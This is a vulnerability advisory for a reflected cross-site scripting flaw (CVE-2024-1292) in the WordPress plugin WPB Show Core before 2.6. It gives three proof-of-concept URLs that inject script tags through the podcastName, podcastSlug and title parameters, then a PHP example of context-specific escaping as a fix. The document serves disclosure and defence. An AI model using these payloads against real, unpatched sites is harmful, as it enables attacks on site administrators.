WPB Show Core < 2.6 - Reflected XSS

Description
The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting, which could be used against high-privilege users such as admin.

Proof of Concept
https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastName=%3Cscript%3Ealert(133
https://example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?podcastSlug=%22%3E%3Cscript%3Ealert(133
https://www.example.com/wp-content/plugins/wpb-show-core/modules/jplayer_new/jplayer_twitter_ver_1.php?title=1-[]-24%3Cscript%3Ealert

Affects Plugins
wpb-show-core (Fixed in 2.6)

References
CVE: CVE-2024-1292

Classification
Type: XSS
OWASP Top 10: A7: Cross-Site Scripting (XSS)
CWE: CWE-79
CVSS: 7.1 (high)

Miscellaneous
Original Researcher: Aly Khaled Aly Abd Al-aal
Submitter: Aly Khaled Aly Abd Al-aal
Submitter Website: https://0x411y.github.io/
Submitter Twitter: Aly_Khal3d
Verified: Yes
WPVDB ID: 56d4fc48-d0dc-4ac6-93cd-f64d4c3c5c07

Timeline
Publicly Published: 2024-03-18
Added: 2024-03-18
Last Updated: 2024-03-18
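The three PoC URLs reflect podcastName, podcastSlug and title into three different output contexts (HTML body, attribute value, inline script), and each context needs its own escaping function. The following is an added example, not the plugin's code (the advisory does not show it): a hardened rendering of those parameters with WordPress core functions, where the surrounding markup and variable names are assumptions.

```php
<?php
// Added example, not WPB Show Core's own code. Assumes it runs inside
// WordPress, so wp_unslash(), sanitize_text_field(), sanitize_title(),
// esc_html(), esc_attr() and wp_json_encode() are available.
//
// Root cause in the advisory: values were echoed back unescaped, i.e. the
// pattern `echo $_GET['podcastName'];`. Input sanitisation alone is not
// enough; the value must be escaped for the context it is written into.

$podcast_name = isset( $_GET['podcastName'] )
    ? sanitize_text_field( wp_unslash( $_GET['podcastName'] ) ) : '';
// A slug only ever needs [a-z0-9-_], so normalise it to exactly that.
$podcast_slug = isset( $_GET['podcastSlug'] )
    ? sanitize_title( wp_unslash( $_GET['podcastSlug'] ) ) : '';
$title = isset( $_GET['title'] )
    ? sanitize_text_field( wp_unslash( $_GET['title'] ) ) : '';

// Inline JavaScript: wp_json_encode() produces a quoted JS string literal,
// and the HEX flags additionally encode < > & ' " as \uXXXX so the value
// can neither terminate the string nor inject a closing </script> tag.
$json_flags = JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT;
?>
<!-- HTML body context: esc_html() turns < and > into entities, so a
     podcastName of <script>... is displayed as literal text. -->
<h2><?php echo esc_html( $podcast_name ); ?></h2>

<!-- Attribute context: esc_attr() also encodes the double quote, so a
     podcastSlug of "><script>... cannot close the attribute early. -->
<div id="wpb-player" data-slug="<?php echo esc_attr( $podcast_slug ); ?>"></div>

<!-- Script context: never concatenate user data into JS; emit it as a
     JSON literal instead. -->
<script>
    var wpbPlayerTitle = <?php echo wp_json_encode( $title, $json_flags ); ?>;
    document.getElementById( 'wpb-player' ).setAttribute( 'title', wpbPlayerTitle );
</script>
```

The same escaping-by-context rule is what distinguishes the fixed 2.6 behaviour from the vulnerable one: a single sanitiser applied on input cannot know which of these three contexts the value will later be written into.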